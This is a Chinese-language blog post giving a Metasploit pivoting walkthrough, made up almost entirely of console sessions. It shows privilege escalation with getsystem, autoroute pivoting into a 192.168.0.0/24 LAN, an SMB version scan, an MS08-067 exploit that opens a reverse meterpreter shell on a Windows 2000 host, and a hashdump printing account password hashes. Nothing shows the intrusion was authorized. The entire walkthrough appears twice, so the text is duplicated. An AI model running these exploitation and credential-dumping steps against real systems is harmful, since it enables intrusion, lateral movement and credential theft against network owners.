metasploit的pivot实例详解
程序员文章站
2022-06-15 22:19:46
first,不管怎么样,各种方式,首先获得一个shell,system权限的shell,建立meterpter的session
meterpreter >...
first,不管怎么样,各种方式,首先获得一个shell,system权限的shell,建立meterpter的session
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeManageVolumePrivilege
meterpreter > getsystem
...got system (via technique 1).
然后看下本地的ip神马的
meterpreter > ipconfig /all
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 65539
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:cd:69:e8
MTU : 1500
IPv4 Address : 192.168.0.116
IPv4 Netmask : 255.255.255.0
然后获取本地网络分配情况
meterpreter > run get_local_subnets
Local subnet: 192.168.0.0/255.255.255.0
ok,咱们开始添加本地网关和ip地址,在session里面创建虚拟路由功能
meterpreter > run autoroute -h
Get a list of local subnets based on the host's routes
USAGE: run get_local_subnets
OPTIONS:
-D Delete all routes (does not require a subnet)
-d Delete the named route instead of adding it
-h Help and usage
-n <opt> Netmask (IPv4, for example, 255.255.255.0
-p Print active routing table. All other options are ignored
-s <opt> Subnet (IPv4, for example, 10.10.10.0)
不多解释,大家都能看懂,我们开始添加IP地址和子网掩码
meterpreter > run autoroute -s 192.168.0.0/24
[*] Adding a route to 192.168.0.0/255.255.255.0...
[+] Added route to 192.168.0.0/255.255.255.0 via xxx.24y.x7.50
[*] Use the -p option to list all active routes
自动分配IP,然后查看一下分配的IP情况
meterpreter > run autoroute -p
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.0.0 255.255.255.0 Session 1
创建 成功,当前session成功创建虚拟路由客户端,后台运行当前session
meterpreter >
Background session 1? [y/N]
扫描当前目标网络的机器smb信息,借此来判断开放smb信息机器的一些信息
msf auxiliary(smb_version) > run www.2cto.com
[*] Scanned 029 of 256 hosts (011% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] 192.168.0.101:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:AV-PC) (domain:AV-PC)
[*] 192.168.0.100:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:USERCHI-4JSMNL8) (domain:WORKGROUP)
[*] Scanned 103 of 256 hosts (040% complete)
[*] 192.168.0.116:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.127:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.128:445 is running Windows 2000 Service Pack 4 with MS05-010+ (language: Chinese - Traditional) (name:J86PG7C8XQQPZDD) (domain:雨薇在线)
[*] Scanned 128 of 256 hosts (050% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
人品爆发了,内网有一台Windows 2000server的机器,试试08067,估计杀他还是没问题的
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.0
LHOST => 192.168.0.0
msf exploit(ms08_067_netapi) > set LPORT 9988
LPORT => 9988
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.128
RHOST => 192.168.0.128
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on xx.xy.xxy.131:9988
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - Service Pack 4 with MS05-010+ - lang:Chinese - Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to yyy.yxy.xyx.154
[*] Meterpreter session 2 opened (xx.xy.xxy.131:9988 -> yyy.yxy.xyx.154:33303) at Sat Mar 24 00:42:30 +0400 2012
meterpreter >
连踩两次*,可以去买彩票了。溢出成功,现在看看ip神马的
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1500
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 16777219
============
Name : AMD PCNET Family Ethernet Adapter
Hardware MAC : 00:0c:29:5f:c6:cd
MTU : 1500
IPv4 Address : 192.168.0.128
IPv4 Netmask : 255.255.255.0
没错,的确是我们的目标机器的内网机器,跟上面的IP是有所不同的吧,
抓hash啊,亲,
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_J86PG7C8XQQPZDD:1001:f1e39dbd0be340d11146fdf88178ba65:be3c0db67905a8e99a381dd109586c17:::
IWAM_J86PG7C8XQQPZDD:1002:2cc6fe6448db8c5f60b62c4796bb3088:2ea4c2826f40da7d5e7d67f001aae9d0:::
TsInternetUser:1000:2d705216336fe3b01ff234d2818fa846:0d834ee5cfa4b88ac3978002e3acadec:::
后台运行看一下
meterpreter >
Background session 2? [y/N]
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 MILSEC\Administrator @ MILSEC xx.xy.xxy.131:5546 -> xxx.24y.57.50:30310 (192.168.0.116)
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ J86PG7C8XQQPZDD xx.xy.xxy.131:9988 -> xxx.24x.148.154:33303 (192.168.0.128)
msf exploit(ms08_067_netapi) >
亲,两个不同的内网IP和不同的外网IP哦,证明是两台不同的机器通过同一个pivot环境来溢出的,
linux 下面的这个是需要root权限来执行的,不然autoroute是会出问题的,Linux的明天再扯,希望这个对大家做内网审计的时候能有一些帮助……
作者 一不小心高潮了
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeManageVolumePrivilege
meterpreter > getsystem
...got system (via technique 1).
然后看下本地的ip神马的
meterpreter > ipconfig /all
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 65539
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:cd:69:e8
MTU : 1500
IPv4 Address : 192.168.0.116
IPv4 Netmask : 255.255.255.0
然后获取本地网络分配情况
meterpreter > run get_local_subnets
Local subnet: 192.168.0.0/255.255.255.0
ok,咱们开始添加本地网关和ip地址,在session里面创建虚拟路由功能
meterpreter > run autoroute -h
Get a list of local subnets based on the host's routes
USAGE: run get_local_subnets
OPTIONS:
-D Delete all routes (does not require a subnet)
-d Delete the named route instead of adding it
-h Help and usage
-n <opt> Netmask (IPv4, for example, 255.255.255.0
-p Print active routing table. All other options are ignored
-s <opt> Subnet (IPv4, for example, 10.10.10.0)
不多解释,大家都能看懂,我们开始添加IP地址和子网掩码
meterpreter > run autoroute -s 192.168.0.0/24
[*] Adding a route to 192.168.0.0/255.255.255.0...
[+] Added route to 192.168.0.0/255.255.255.0 via xxx.24y.x7.50
[*] Use the -p option to list all active routes
自动分配IP,然后查看一下分配的IP情况
meterpreter > run autoroute -p
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.0.0 255.255.255.0 Session 1
创建 成功,当前session成功创建虚拟路由客户端,后台运行当前session
meterpreter >
Background session 1? [y/N]
扫描当前目标网络的机器smb信息,借此来判断开放smb信息机器的一些信息
msf auxiliary(smb_version) > run www.2cto.com
[*] Scanned 029 of 256 hosts (011% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] 192.168.0.101:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:AV-PC) (domain:AV-PC)
[*] 192.168.0.100:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:USERCHI-4JSMNL8) (domain:WORKGROUP)
[*] Scanned 103 of 256 hosts (040% complete)
[*] 192.168.0.116:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.127:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.128:445 is running Windows 2000 Service Pack 4 with MS05-010+ (language: Chinese - Traditional) (name:J86PG7C8XQQPZDD) (domain:雨薇在线)
[*] Scanned 128 of 256 hosts (050% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
人品爆发了,内网有一台Windows 2000server的机器,试试08067,估计杀他还是没问题的
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.0
LHOST => 192.168.0.0
msf exploit(ms08_067_netapi) > set LPORT 9988
LPORT => 9988
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.128
RHOST => 192.168.0.128
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on xx.xy.xxy.131:9988
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - Service Pack 4 with MS05-010+ - lang:Chinese - Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to yyy.yxy.xyx.154
[*] Meterpreter session 2 opened (xx.xy.xxy.131:9988 -> yyy.yxy.xyx.154:33303) at Sat Mar 24 00:42:30 +0400 2012
meterpreter >
连踩两次*,可以去买彩票了。溢出成功,现在看看ip神马的
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1500
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 16777219
============
Name : AMD PCNET Family Ethernet Adapter
Hardware MAC : 00:0c:29:5f:c6:cd
MTU : 1500
IPv4 Address : 192.168.0.128
IPv4 Netmask : 255.255.255.0
没错,的确是我们的目标机器的内网机器,跟上面的IP是有所不同的吧,
抓hash啊,亲,
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_J86PG7C8XQQPZDD:1001:f1e39dbd0be340d11146fdf88178ba65:be3c0db67905a8e99a381dd109586c17:::
IWAM_J86PG7C8XQQPZDD:1002:2cc6fe6448db8c5f60b62c4796bb3088:2ea4c2826f40da7d5e7d67f001aae9d0:::
TsInternetUser:1000:2d705216336fe3b01ff234d2818fa846:0d834ee5cfa4b88ac3978002e3acadec:::
后台运行看一下
meterpreter >
Background session 2? [y/N]
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 MILSEC\Administrator @ MILSEC xx.xy.xxy.131:5546 -> xxx.24y.57.50:30310 (192.168.0.116)
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ J86PG7C8XQQPZDD xx.xy.xxy.131:9988 -> xxx.24x.148.154:33303 (192.168.0.128)
msf exploit(ms08_067_netapi) >
亲,两个不同的内网IP和不同的外网IP哦,证明是两台不同的机器通过同一个pivot环境来溢出的,
linux 下面的这个是需要root权限来执行的,不然autoroute是会出问题的,Linux的明天再扯,希望这个对大家做内网审计的时候能有一些帮助……
作者 一不小心高潮了